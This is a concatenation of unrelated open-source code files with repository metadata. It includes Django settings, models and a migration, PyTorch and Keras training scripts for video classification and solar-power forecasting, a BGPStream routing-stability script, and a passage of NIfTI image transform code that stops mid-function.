'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'myproject_3.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'myproject_3.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"dheerajgadhamsetty"
] | dheerajgadhamsetty |
8e6659d0c00a5650bd1681c6f669fe5fc6f3a1b4 | 2891a904792376e20c3b481a556c3823a2a09625 | /src/spatial_stream.py | 4ae598257218b9e77f91486a19789e8f23196784 | [
"MIT"
] | permissive | ganler/2StreamConvNet-for-single-channel-series | 46dac979a2b5853804f2dd3415995c0ac0a61899 | c58c248c3a259cee4a4c14575bc95b643e56a6c6 | refs/heads/master | 2021-07-03T06:31:19.186924 | 2020-09-19T08:35:01 | 2020-09-19T08:35:01 | 171,025,708 | 3 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,435 | py | import torchvision.models as models
from torchvision import transforms
import torch
import numpy as np
from torch import nn
from src.spatial_and_motion_dataloader import * # self-made
if __name__ == "__main__":
key_word = 'spatial'
# DEVICE
# ########## !!! LOOK HERE !!! ############ #
use_gpu = 0
# ######################################### #
device = torch.device('cuda' if torch.cuda.is_available() and use_gpu else 'cpu')
# PARAMETERS
num_epoachs = 1
batch_size = 5
times4print = 100 / batch_size # time for print (I print the info for every * batches)
num_classes = 17
classes = np.arange(num_classes)
learning_rate = 0.01
train_dataset = sm_dataset('train.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
valid_dataset = sm_dataset('valid.csv', key_word, transforms.Compose([transforms.Resize((224, 224)), transforms.ToTensor()]))
# LOADER
train_loader = torch.utils.data.DataLoader(dataset=train_dataset,
batch_size=1,
num_workers=2,
shuffle=False)
valid_loader = torch.utils.data.DataLoader(dataset=valid_dataset,
num_workers=2,
shuffle=False)
# ===========CHOOSE THE MODELS===========
# MODEL, LOSS FUNC AND OPTIMISER
# resnet
# model = models.ResNet(pretrained=True)
model = models.resnet18(pretrained=True)
# model = models.resnet34(pretrained=True)
# model = models.resnet50(pretrained=True)
# vgg
# model = models.VGG(pretrained=True)
# model = models.vgg11(pretrained=True)
# model = models.vgg16(pretrained=True)
# model = models.vgg16_bn(pretrained=True)
pre_model = model
model.fc = nn.Linear(model.fc.in_features, num_classes)
pretrained_dict = pre_model.state_dict()
model_dict = model.state_dict()
# 将pretrained_dict里不属于model_dict的键剔除掉
pretrained_dict = {k: v for k, v in pretrained_dict.items() if k in model_dict}
model_dict.update(pretrained_dict)
# TRAIN MODE 1 ================================
model.load_state_dict(model_dict)
# 至此fine-tune对应的结构已经搞定
# 除了最后两层,其余都把梯度给冻结
for para in list(model.parameters())[:-2]:
para.requires_grad = False
# 只训练最后2层
optimizer = torch.optim.Adamax(params=[model.fc.weight, model.fc.bias], lr=learning_rate, weight_decay=1e-4)
# -------------================================
#
# # TRAIN MODE 2 ================================
# ignored_params = list(map(id, model.parameters()[:-2]))
# # fc3是net中的一个数据成员
# base_params = filter(
# lambda p: id(p) not in ignored_params,
# model.parameters()
# )
# '''
# id(x)返回的是x的内存地址。上面的意思是,对于在net.parameters()中的p,过滤掉'id(p) not in ignored_params'中的p。
# '''
#
# optimizer = torch.optim.Adamax(
# [{'params': base_params},
# {'params': model.fc3.parameters(), 'lr': learning_rate}],
# 1e-3, weight_decay=1e-4
# )
# # -------------================================
if torch.cuda.is_available() and use_gpu:
model = model.cuda()
loss_func = nn.CrossEntropyLoss()
# TRAIN
total_steps = len(train_loader)
for epoach in range(num_epoachs):
loss_accumulation = 0
for i, (imgs, labels) in enumerate(train_loader):
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
loss = loss_func(out, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
loss_accumulation += loss.item()
if (i + 1) % times4print == 0:
print(f"[{epoach+1}/{num_epoachs}]: -> [{i+1}/{total_steps}] -> loss: {loss_accumulation/times4print}")
loss_accumulation = 0
# TEST
model.eval()
label_cp = np.zeros(len(valid_loader))
np_out = np.zeros((len(valid_loader), num_classes))
with torch.no_grad():
class_correct = list(0. for i in range(num_classes))
class_total = class_correct.copy()
for k, (imgs, labels) in enumerate(valid_loader):
label_cp[k] = labels.numpy()
imgs = imgs.to(device)
labels = labels.to(device)
out = model(imgs)
np_out[k] = out.numpy()
_, predicted = torch.max(out, 1)
ans_batch = (predicted == labels).squeeze()
for k, label in enumerate(labels):
if ans_batch.item() == 1: # right
class_correct[label] += 1
class_total[label] += 1
if sum(class_total) != 0:
print(f">>> FINAL ACCURACY: {100 * sum(class_correct)/sum(class_total)}% -> {class_correct}/{class_total}")
for i in range(num_classes):
if class_total[i] != 0:
print(f">>> [{classes[i]}] : {100 * class_correct[i]/class_total[i]}% -> {class_correct[i]}/{class_total[i]}")
np.savetxt(key_word+'_out.txt', np_out)
np.savetxt('label_out.txt', label_cp)
torch.save(model.state_dict(), key_word+'_stream_model.ckpt') | [
"noreply@github.com"
] | ganler.noreply@github.com |
72e9179d8da40397dd4755d7c720ec0e48a57713 | 8fd559be6696d8913e60e9b8628c064305a828bd | /fruit/models.py | cb2399f1c5dc6965539d6864452b4e3562ea08fe | [] | no_license | shravanchandra/farmapp | 003bfd14804ae1b5026e3bd64b07891d5402ab3b | 8bbedf218660790497cae7d21b8092e4b39d490e | refs/heads/master | 2021-01-25T16:10:10.191844 | 2016-04-03T11:07:20 | 2016-04-03T11:07:20 | 51,570,353 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 489 | py | from django.db import models
from django.contrib.auth.models import User
from root.models import *
from api.models import *
# Create your models here.
class Fruit_Transaction(models.Model):
description = models.TextField()
farm = models.ForeignKey(Farming)
day = models.DateField()
delivery = models.ForeignKey(Delivery)
user = models.ForeignKey(User)
price = models.FloatField()
no_of_units_sold = models.IntegerField()
yields = models.ForeignKey(Yield)
| [
"Shravan.Kumar@polestartechnologyltd.com"
] | Shravan.Kumar@polestartechnologyltd.com |
e2305a194758b56976ba2b3d942a874de4f50a80 | bfe13b5458c5a3b8a212479ad8596934738a83d9 | /solar/solar_conv1d_1.py | b6c23eee1267e5d4790dbb3a0f5d9eff7cae0ab1 | [] | no_license | sswwd95/Project | f32968b6a640dffcfba53df943f0cf48e60d29df | fdcf8556b6203a407e5548cb4eda195fb597ad6e | refs/heads/master | 2023-04-21T23:03:24.282518 | 2021-02-15T00:55:16 | 2021-02-15T00:55:16 | 338,989,928 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,872 | py | import pandas as pd
import numpy as np
import os
import glob
import random
import tensorflow.keras.backend as K
import warnings
warnings.filterwarnings('ignore')
train = pd.read_csv('./solar/csv/train.csv')
sub = pd.read_csv('./solar/csv/sample_submission.csv')
# Hour - 시간
# Minute - 분
# DHI - 수평면 산란일사량(Diffuse Horizontal Irradiance (W/m2))
# DNI - 직달일사량(Direct Normal Irradiance (W/m2))
# WS - 풍속(Wind Speed (m/s))
# RH - 상대습도(Relative Humidity (%))
# T - 기온(Temperature (Degree C))
# Target - 태양광 발전량 (kW)
# axis = 0은 행렬에서 행의 원소를 다 더함, 1은 열의 원소를 다 더함
# 1. 데이터
#DHI, DNI 보다 더 직관적인 GHI 열 추가.
def preprocess_data(data, is_train=True):
data['cos'] = np.cos(np.pi/2 - np.abs(data['Hour']%12-6)/6*np.pi/2)
data.insert(1, 'GHI', data['DNI']*data['cos']+data['DHI'])
temp = data.copy()
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
if is_train==True:
temp['Target1'] = temp['TARGET'].shift(-48).fillna(method='ffill') # day7
temp['Target2'] = temp['TARGET'].shift(-48*2).fillna(method='ffill') # day8
temp = temp.dropna()
return temp.iloc[:-96] # day8에서 2일치 땡겨서 올라갔기 때문에 마지막 2일 빼주기
elif is_train==False:
temp = temp[['Hour','TARGET','GHI','DHI', 'DNI', 'WS', 'RH', 'T']]
return temp.iloc[-48:,:] # 트레인데이터가 아니면 마지막 하루만 리턴시킴
df_train = preprocess_data(train)
x_train = df_train.to_numpy()
print(x_train)
print(x_train.shape) #(52464, 10) day7,8일 추가해서 컬럼 10개
###### test파일 합치기############
df_test = []
for i in range(81):
file_path = '../solar/test/' + str(i) + '.csv'
temp = pd.read_csv(file_path)
temp = preprocess_data(temp, is_train=False) # 위에서 명시한 False => 마지막 하루만 리턴
df_test.append(temp) # 마지막 하루 값들만 전부 붙여주기
x_test = pd.concat(df_test)
print(x_test.shape) #(3888, 8) -> (81, 48,8) 81일, 하루(24*2(30분단위)=48), 8개 컬럼
x_test = x_test.to_numpy()
##################################
# 정규화 (데이터가 0으로 많이 쏠려있어서 standardscaler 사용)
from sklearn.preprocessing import StandardScaler
scaler = StandardScaler()
scaler.fit(x_train[:,:-2]) # day7,8일을 빼고 나머지 컬럼들을 train
x_train[:,:-2] = scaler.transform(x_train[:,:-2])
x_test = scaler.transform(x_test)
######## train데이터 분리 ###########
def split_xy(data,timestep):
x, y1, y2 = [],[],[]
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end,:-2] # x_train
tmp_y1 = data[x_end-1:x_end,-2] # day7 / x_end-1:x_end => i:x_end와 같은 위치로 맞춰주기
tmp_y2 = data[x_end-1:x_end,-1] # day8
x.append(tmp_x)
y1.append(tmp_y1)
y2.append(tmp_y2)
return(np.array(x), np.array(y1), np.array(y2))
x, y1, y2 = split_xy(x_train,1) # x_train을 한 행씩 자른다. (30분 단위로 보면서 day7,8의 같은 시간대 예측)
print(x.shape) #(52464, 1, 8)
print(y1.shape) #(52464, 1)
print(y2.shape) #(52464, 1)
########## test 데이터를 train 데이터와 같게 분리 ######
def split_x(data, timestep) :
x = []
for i in range(len(data)):
x_end = i + timestep
if x_end>len(data):
break
tmp_x = data[i:x_end]
x.append(tmp_x)
return(np.array(x))
x_test = split_x(x_test,1)
######################################################
from sklearn.model_selection import train_test_split
x_train, x_val, y1_train, y1_val, y2_train, y2_val = train_test_split(
x, y1, y2, train_size = 0.8, random_state=0)
print(x_train.shape) #(41971, 1, 8)
def quantile_loss(q, y_true, y_pred):
e = (y_true - y_pred) # 원래값에서 예측값 뺀 것
return K.mean(K.maximum(q*e, (q-1)*e), axis=-1)
quantiles = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]
# 2. 모델구성
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Conv1D, Flatten, Dropout
def Model():
model = Sequential()
model.add(Conv1D(128,2,padding='same',activation='relu', input_shape = (1,8)))
model.add(Dropout(0.2))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Conv1D(64,2,padding='same', activation='relu'))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(16, activation='relu'))
model.add(Dense(1, activation='relu'))
return model
from tensorflow.keras.callbacks import EarlyStopping,ModelCheckpoint,ReduceLROnPlateau
modelpath = '../solar/check/solar0121_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
es = EarlyStopping(monitor = 'val_loss', patience=10, mode='min')
lr = ReduceLROnPlateau(monitor='val_loss', patience=5, factor=0.5)
bs = 16
epochs = 1
######day7######
x=[]
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day7_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y1_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y1_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp1 = pd.concat(x, axis=1)
df_temp1[df_temp1<0] = 0 # 0보다 작으면 0로 한다.
num_temp1 = df_temp1.to_numpy()
sub.loc[sub.id.str.contains('Day7'), 'q_0.1':] = num_temp1
######day8#######
x = []
for q in quantiles:
model = Model()
modelpath = '../solar/check/solar_0121_day8_{epoch:02d}_{val_loss:.4f}.hdf5'
cp = ModelCheckpoint(filepath=modelpath, monitor='val_loss', save_best_only=True, mode='auto')
model.compile(loss=lambda y_true,y_pred: quantile_loss(q,y_true, y_pred),
optimizer='adam', metrics = [lambda y, y_pred: quantile_loss(q, y, y_pred)])
model.fit(x_train,y2_train, batch_size = bs, callbacks=[es, cp, lr], epochs=epochs, validation_data=(x_val, y2_val))
pred = pd.DataFrame(model.predict(x_test).round(2)) # round는 반올림 (2)는 . 뒤의 자리수 -> ex) 0.xx를 반올림
x.append(pred)
df_temp2 = pd.concat(x, axis=1)
df_temp2[df_temp2<0] = 0
num_temp2 = df_temp2.to_numpy()
sub.loc[sub.id.str.contains('Day8'), 'q_0.1':] = num_temp2
sub.to_csv('./solar/csv/sub_0121.csv', index=False)
| [
"sswwd95@gmail.com"
] | sswwd95@gmail.com |
004c56bd494899dd28e119a7a35e0bbae4c986b5 | e99509d3239513e37742646632352d914f1132cf | /stability-1/bgpstream_stability.py | 6dad3e78a00a02b8e566d24841a76c0e77904db3 | [] | no_license | CAIDA/bgp-hackathon | 4c8eab6be2c28576dc6953837711a504f47af2e0 | b95cfd0d6b22f6d61f81e3eca93e177b3d08ae21 | refs/heads/master | 2021-01-17T07:02:35.859766 | 2016-06-20T21:06:48 | 2016-06-20T21:06:48 | 43,771,622 | 29 | 11 | null | 2016-03-07T23:02:00 | 2015-10-06T18:53:52 | Perl | UTF-8 | Python | false | false | 5,418 | py | #!/usr/bin/env python
#
# Copyright (C) 2015
# Authors: Nathan Owens & Andrew Mulhern
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License as published by the Free Software
# Foundation; either version 2 of the License, or (at your option) any later
# version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program. If not, see <http://www.gnu.org/licenses/>.
#
import sys
import json
import copy
import math
import urllib
import multiprocessing
from _pybgpstream import BGPStream, BGPRecord, BGPElem
from collections import defaultdict
from datetime import datetime
def deal_with_time_bucket_junk(prefix, timestamp):
if prefix not in raw_bgp_stream_data:
newBuckets = copy.deepcopy(buckets)
raw_bgp_stream_data[prefix] = newBuckets
duration = timestamp - stream_start
bucket = int(duration / 300)
try:
raw_bgp_stream_data[prefix][bucket]["count"] += 1
except:
pass
def create_time_buckets(start, end):
time_step = 300 # 5 multiprocessing
buckets = []
for x in xrange(start, end, time_step):
new_end = x + 300
window = {"start": x, "end": new_end, "count": 0}
buckets.append(window)
return buckets
def get_ripe_probes(prefix_list):
def get_probe_list(ip_proto, prefix_data, return_dict):
prefix = prefix_data[0]
count = prefix_data[1]
bucket_data = prefix_data[2]
url = "https://atlas.ripe.net/api/v1/probe/?format=json&prefix_%s=%s" % (ip_proto, prefix)
probe_data = json.loads(urllib.urlopen(url).read())
probe_count = probe_data["meta"]["total_count"]
probe_ids = []
if probe_count > 0:
for probe in probe_data["objects"]:
probe_id = probe["id"]
probe_ids.append(probe_id)
if len(probe_ids) > 0:
return_dict[prefix] = {"count": count, "bucket_data": bucket_data, "probe_count": probe_count, "probe_ids": probe_ids}
return
jobs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
for prefix_data in prefix_list:
prefix = prefix_data[0]
if "." in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v4", prefix_data, return_dict))
elif ":" in prefix:
job = multiprocessing.Process(target=get_probe_list, args=("v6", prefix_data, return_dict))
jobs.append(job)
job.start()
for job in jobs:
job.join()
return dict(return_dict)
if __name__ == "__main__":
try:
stream_start = int(sys.argv[1])
stream_end = int(sys.argv[2])
out_file_name = sys.argv[3]
except:
print "Usage: %s [start time] [end time] [output file name]" %(sys.argv[0])
exit()
#stream_start = 1454284800
#stream_end = 1454288400
buckets = create_time_buckets(stream_start, stream_end)
prefixList = []
raw_bgp_stream_data = {}
stream = BGPStream()
rec = BGPRecord()
stream.add_filter('collector', 'rrc06')
stream.add_filter('record-type', 'updates')
stream.add_interval_filter(stream_start, stream_end)
stream.start()
while(stream.get_next_record(rec)):
elem = rec.get_next_elem()
while(elem):
prefix = elem.fields.get("prefix", "")
time_stamp = rec.time # unix epoc timestamp 1427846670
if prefix != "":
deal_with_time_bucket_junk(prefix, time_stamp)
elem = rec.get_next_elem()
for prefix in list(raw_bgp_stream_data):
for bucket in list(raw_bgp_stream_data[prefix]):
if bucket["count"] < 3:
raw_bgp_stream_data[prefix].remove(bucket)
for prefix in raw_bgp_stream_data:
index = 0
max_index = 0
max_val = 0
last_val = 0
for bucket in raw_bgp_stream_data[prefix]:
curr = bucket["count"]
if curr > last_val:
max_val = curr
index += 1
last_val = curr
if raw_bgp_stream_data[prefix]:
prefixList.append((prefix, max_val, raw_bgp_stream_data[prefix][max_index]))
prefixListWithProbes = get_ripe_probes(prefixList)
import get_probe_data
results = []
for prefix, values in prefixListWithProbes.iteritems():
start_time = values["bucket_data"]["start"]
end_time = values["bucket_data"]["end"]
count = values["count"]
probe_list = values["probe_ids"]
for probe in probe_list:
packet_loss = get_probe_data.get_packet_loss(probe, start_time, end_time)
results.append({"prefix":prefix, "count":count, "start_time":start_time, "end_time":end_time, "probe":probe, "packet_loss":packet_loss})
sorted_results = list(sorted(results, reverse=True, key = lambda x: (x["count"], x["packet_loss"])))
out_file = open(out_file_name, "w")
out_file.write(json.dumps(sorted_results, indent=3))
out_file.close()
| [
"Nathan_Owens@cable.comcast.com"
] | Nathan_Owens@cable.comcast.com |
6420eb175c932c58d4a7dbb0d816742e4b73a937 | 10e3f9659affb4c74280ee27a6e485c8d7e86c56 | /pySamples/testGetAttrCurrentMod.py | caf4f2d91dc7c82e451f01b45b68844100f9c59a | [] | no_license | benwei/Learnings | a52a751e6ba9bbbbf7b51b0e6b6ac5e839a87cd3 | e020698c2be16bf7eb1c7fb9bf19276165cc0400 | refs/heads/master | 2023-02-04T22:27:00.182020 | 2023-01-19T16:52:31 | 2023-01-19T16:57:43 | 1,994,139 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 127 | py | import sys
def test():
print "getattr current mode run: test()"
o = getattr(sys.modules[__name__], 'test')
if o:
o()
| [
"ben@staros.mobi"
] | ben@staros.mobi |
b8650f08115fc04e8145f89e4f8811f0521fc19b | c4589dc8775e3005230b6a47a454d68d6725f7f4 | /twitter/mole/migrations/0001_initial.py | e950ff611a3d02afbec092873e6bb027a6b87505 | [] | no_license | mriverov/tip.twitter | 8338980bf81850265fdec5871e838af7c513b811 | 2790d6516d585f8693e9b44e1c0dfd50a1d89f5c | refs/heads/master | 2020-04-06T03:33:25.825610 | 2016-08-13T22:10:09 | 2016-08-13T22:10:09 | 19,164,924 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,715 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-13 05:05
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='KeyWord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100, null=True)),
('count', models.IntegerField(blank=True, default=0, null=True)),
],
),
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(blank=True, max_length=100, null=True)),
],
),
migrations.CreateModel(
name='Trend',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date', models.CharField(blank=True, max_length=500, null=True)),
('tweets_count', models.IntegerField(blank=True, default=0, null=True)),
('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project')),
],
),
migrations.CreateModel(
name='Tweet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('tweet_id', models.BigIntegerField(blank=True, null=True)),
('text', models.CharField(blank=True, max_length=5000, null=True)),
('retweet_count', models.IntegerField(blank=True, null=True)),
('created_at', models.DateTimeField(blank=True, null=True)),
('retweet_id', models.BigIntegerField(blank=True, null=True)),
],
),
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('user_id', models.BigIntegerField(blank=True, null=True)),
('screen_name', models.CharField(blank=True, default=b'', max_length=500, null=True)),
('followers_count', models.IntegerField(blank=True, default=0, null=True)),
('location', models.CharField(blank=True, default=b'', max_length=500, null=True)),
('centrality', models.FloatField(blank=True, default=0.0, null=True)),
('followers', models.ManyToManyField(blank=True, null=True, related_name='_user_followers_+', to='mole.User')),
],
),
migrations.AddField(
model_name='tweet',
name='author',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.User'),
),
migrations.AddField(
model_name='tweet',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
),
migrations.AddField(
model_name='tweet',
name='trend',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Trend'),
),
migrations.AddField(
model_name='keyword',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='mole.Project'),
),
]
| [
"mrivero@Marina.local"
] | mrivero@Marina.local |
f0ccc3a5a140f298542c4fcf90576bdb112694b0 | e1fb0c63140a4cfebbe1c72fc2e5e76202e1b0f0 | /niftidataset/transforms.py | 32d4ac7829bdd7510a3daec502d659cded1be58a | [
"Apache-2.0"
] | permissive | s-mostafa-a/niftidataset | d11c1036d64fc5d25952fda5bfbd7a78d1507b0f | fa0175cf08753e6294d04e259b9b447a6dd3fa88 | refs/heads/master | 2022-11-15T18:36:10.118969 | 2020-07-11T09:53:50 | 2020-07-11T09:53:50 | 277,276,675 | 0 | 0 | NOASSERTION | 2020-07-05T10:16:05 | 2020-07-05T10:16:04 | null | UTF-8 | Python | false | false | 27,230 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
niftidataset.transforms
transformations to apply to images in dataset
Author: Jacob Reinhold (jacob.reinhold@jhu.edu)
Created on: Oct 24, 2018
"""
__all__ = ['RandomCrop2D',
'RandomCrop3D',
'RandomCrop',
'RandomSlice',
'ToTensor',
'ToPILImage',
'AddChannel',
'FixIntensityRange',
'Normalize',
'Digitize',
'MedianFilter',
'RandomAffine',
'RandomBlock',
'RandomFlip',
'RandomGamma',
'RandomNoise',
'TrimIntensity',
'get_transforms']
import random
from typing import Optional, Tuple, Union
import numpy as np
from PIL import Image
import torch
import torchvision as tv
import torchvision.transforms.functional as TF
from .errors import NiftiDatasetError
PILImage = type(Image)
class BaseTransform:
def __repr__(self): return f'{self.__class__.__name__}'
class CropBase(BaseTransform):
""" base class for crop transform """
def __init__(self, out_dim:int, output_size:Union[tuple,int,list], threshold:Optional[float]=None,
pct:Tuple[float,float]=(0.,1.), axis=0):
""" provide the common functionality for RandomCrop2D and RandomCrop3D """
assert isinstance(output_size, (int, tuple, list))
if isinstance(output_size, int):
self.output_size = (output_size,)
for _ in range(out_dim - 1):
self.output_size += (output_size,)
else:
assert len(output_size) == out_dim
self.output_size = output_size
self.out_dim = out_dim
self.thresh = threshold
self.pct = pct
self.axis = axis
def _get_sample_idxs(self, img: np.ndarray) -> Tuple[int, int, int]:
""" get the set of indices from which to sample (foreground) """
mask = np.where(img >= (img.mean() if self.thresh is None else self.thresh)) # returns a tuple of length 3
c = np.random.randint(0, len(mask[0])) # choose the set of idxs to use
h, w, d = [m[c] for m in mask] # pull out the chosen idxs
return h, w, d
def _offset_by_pct(self, h, w, d):
s = (h, w, d)
hml = wml = dml = 0
hmh = wmh = dmh = 0
i0, i1 = int(s[self.axis] * self.pct[0]), int(s[self.axis] * (1. - self.pct[1]))
if self.axis == 0:
hml += i0
hmh += i1
elif self.axis == 1:
wml += i0
wmh += i1
else:
dml += i0
dmh += i1
return (hml, wml, dml), (hmh, wmh, dmh)
def __repr__(self):
s = '{name}(output_size={output_size}, threshold={thresh})'
d = dict(self.__dict__)
return s.format(name=self.__class__.__name__, **d)
class RandomCrop2D(CropBase):
"""
Randomly crop a 2d slice/patch from a 3d image
Args:
output_size (tuple or int): Desired output size.
If int, cube crop is made.
axis (int or None): along which axis should the patch/slice be extracted
provide None for random axis
include_neighbors (bool): extract 3 neighboring slices instead of just 1
"""
def __init__(self, output_size:Union[int,tuple,list], axis:Optional[int]=0,
include_neighbors:bool=False, threshold:Optional[float]=None) -> None:
if axis is not None:
assert 0 <= axis <= 2
super().__init__(2, output_size, threshold)
self.axis = axis
self.include_neighbors = include_neighbors
def __call__(self, sample:Tuple[np.ndarray,np.ndarray]) -> Tuple[np.ndarray,np.ndarray]:
axis = self.axis if self.axis is not None else np.random.randint(0, 3)
src, tgt = sample
*cs, h, w, d = src.shape
*ct, _, _, _ = src.shape
new_h, new_w = self.output_size
max_idxs = (np.inf, w - new_h//2, d - new_w//2) if axis == 0 else \
(h - new_h//2, np.inf, d - new_w//2) if axis == 1 else \
(h - new_h//2, w - new_w//2, np.inf)
min_idxs = (-np.inf, new_h//2, new_w//2) if axis == 0 else \
(new_h//2, -np.inf, new_w//2) if axis == 1 else \
(new_h//2, new_w//2, -np.inf)
s = src[0] if len(cs) > 0 else src # use the first image to determine sampling if multimodal
s_idxs = super()._get_sample_idxs(s)
idxs = [i if min_i <= i <= max_i else max_i if i > max_i else min_i
for max_i, min_i, i in zip(max_idxs, min_idxs, s_idxs)]
s = self._get_slice(src, idxs, axis).squeeze()
t = self._get_slice(tgt, idxs, axis).squeeze()
if len(cs) == 0 or s.ndim == 2: s = s[np.newaxis,...] # add channel axis if empty
if len(ct) == 0 or t.ndim == 2: t = t[np.newaxis,...]
return s, t
def _get_slice(self, img:np.ndarray, idxs:Tuple[int,int,int], axis:int) -> np.ndarray:
h, w = self.output_size
n = 1 if self.include_neighbors else 0
oh = 0 if h % 2 == 0 else 1
ow = 0 if w % 2 == 0 else 1
i, j, k = idxs
s = img[..., i-n:i+1+n, j-h//2:j+h//2+oh, k-w//2:k+w//2+ow] if axis == 0 else \
img[..., i-h//2:i+h//2+oh, j-n:j+1+n, k-w//2:k+w//2+ow] if axis == 1 else \
img[..., i-h//2:i+h//2+oh, j-w//2:j+w//2+ow, k-n:k+1+n]
if self.include_neighbors:
s = np.transpose(s, (0,1,2)) if axis == 0 else \
np.transpose(s, (1,0,2)) if axis == 1 else \
np.transpose(s, (2,0,1))
return s
class RandomCrop3D(CropBase):
"""
Randomly crop a 3d patch from a (pair of) 3d image
Args:
output_size (tuple or int): Desired output size.
If int, cube crop is made.
"""
def __init__(self, output_size:Union[tuple,int,list], threshold:Optional[float]=None,
pct:Tuple[float,float]=(0.,1.), axis=0):
super().__init__(3, output_size, threshold, pct, axis)
def __call__(self, sample:Tuple[np.ndarray,np.ndarray]) -> Tuple[np.ndarray,np.ndarray]:
src, tgt = sample
*cs, h, w, d = src.shape
*ct, _, _, _ = tgt.shape
hh, ww, dd = self.output_size
(hml, wml, dml), (hmh, wmh, dmh) = self._offset_by_pct(h,w,d)
max_idxs = (h-hmh-hh//2, w-wmh-ww//2, d-dmh-dd//2)
min_idxs = (hml+hh//2, wml+ww//2, dml+dd//2)
s = src[0] if len(cs) > 0 else src # use the first image to determine sampling if multimodal
s_idxs = self._get_sample_idxs(s)
i, j, k = [i if min_i <= i <= max_i else max_i if i > max_i else min_i
for max_i, min_i, i in zip(max_idxs, min_idxs, s_idxs)]
oh = 0 if hh % 2 == 0 else 1
ow = 0 if ww % 2 == 0 else 1
od = 0 if dd % 2 == 0 else 1
s = src[..., i-hh//2:i+hh//2+oh, j-ww//2:j+ww//2+ow, k-dd//2:k+dd//2+od]
t = tgt[..., i-hh//2:i+hh//2+oh, j-ww//2:j+ww//2+ow, k-dd//2:k+dd//2+od]
if len(cs) == 0: s = s[np.newaxis,...] # add channel axis if empty
